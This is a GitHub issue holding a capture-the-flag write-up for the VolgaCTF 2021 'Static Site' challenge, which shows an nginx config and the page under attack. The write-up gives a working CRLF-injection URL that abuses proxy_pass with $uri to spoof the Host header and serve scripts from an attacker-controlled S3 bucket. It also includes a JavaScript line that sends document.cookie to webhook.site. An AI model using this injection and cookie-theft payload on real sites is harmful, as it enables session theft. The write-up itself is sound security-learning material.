Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

VolgaCTF 2021 Qualifier - Static Site #28

Open
aszx87410 opened this issue Mar 28, 2021 · 0 comments
Open

VolgaCTF 2021 Qualifier - Static Site #28

aszx87410 opened this issue Mar 28, 2021 · 0 comments
Labels

Comments

@aszx87410
Copy link
Owner

aszx87410 commented Mar 28, 2021

Static Site

Description

螢幕快照 2021-03-28 下午11 12 54

nginx config

server {
    listen 443 ssl;
    resolver 8.8.8.8;
    server_name static-site.volgactf-task.ru;

    ssl_certificate      /etc/letsencrypt/live/volgactf-task.ru/fullchain1.pem;
    ssl_certificate_key  /etc/letsencrypt/live/volgactf-task.ru/privkey1.pem;

    add_header Content-Security-Policy "default-src 'self'; object-src 'none'; frame-src https://www.google.com/recaptcha/; font-src https://fonts.gstatic.com/; style-src 'self' https://fonts.googleapis.com/; script-src 'self' https://www.google.com/recaptcha/api.js https://www.gstatic.com/recaptcha/" always;
   
    location / {
      root /var/www/html;
    }

    location /static/ {
      proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
    }
}

index.html

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Static Site</title>
    <link rel="stylesheet" href="./static/bootstrap.min.css">
  </head>

  <body class="text-center">
    <div class="cover-container d-flex h-100 p-3 mx-auto flex-column">
      <header class="mt-5">
          <h3 class="masthead-brand">Static Site</h3>
      </header>

      <main role="main" class="mt-5">
        <p class="lead"><img src="./static/hacker.gif"/></p>
        <p class="lead pt-5">
          Ok, hackers, I created a static site with a strict Content-Security-Policy.
        </p>
        <p class="lead">
          It is simply impossible to steal my cookies now!
        </p>
        <p class="lead">
          But, you can still try:
        </p>
        <p>
          <form id="form" class="form-inline justify-content-center" method="POST" action="https://bot-static-site.volgactf-task.ru/">
            <div class="form-group">
              <label for="url">URL</label>
              <input type="url" name="url" id="url" class="form-control mx-sm-3">
              <input type="submit" class="btn btn-secondary g-recaptcha" data-sitekey="6LdN230aAAAAAPsMXHWZ9szidC6tbkSzWDarMqmL" data-callback="onSubmit" data-action="submit">
            </div>
          </form>
        </p>
      </main>
    </div>
    <script src="https://www.google.com/recaptcha/api.js"></script>
    <script src="./static/captcha.js"></script>
  </body>
</html>

Writeup

After review the nginx config and the html file, this part catch my eyes:

location /static/ {
   proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
}

Then I googled nginx $uri vulnerability and found some useful resources:

  1. Bottle HTTP 头注入漏洞探究
  2. 新浪某站CRLF Injection导致的安全问题
  3. Some cases of insecure NGINX configurations

We can use CRLF injection and change the request. I am not familiar with nginx so I create an environment on my local to see how can I use it. After playing for a while I found that I can fake the Host header to read the file in my own bucket:

https://static-site.volgactf-task.ru/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:

So the solution is straightforward:

  1. create my own S3 bucket
  2. upload /static/index.html
  3. upload /static/app.js
  4. let bot visits https://static-site.volgactf-task.ru/static/index.html%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
  5. XSS triggered!

html file

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  </head>

  <body class="text-center">
    
    hello
    <script src="/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:"></script>
  </body>
</html>

js file

window.location = 'https://webhook.site?c='+document.cookie
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

1 participant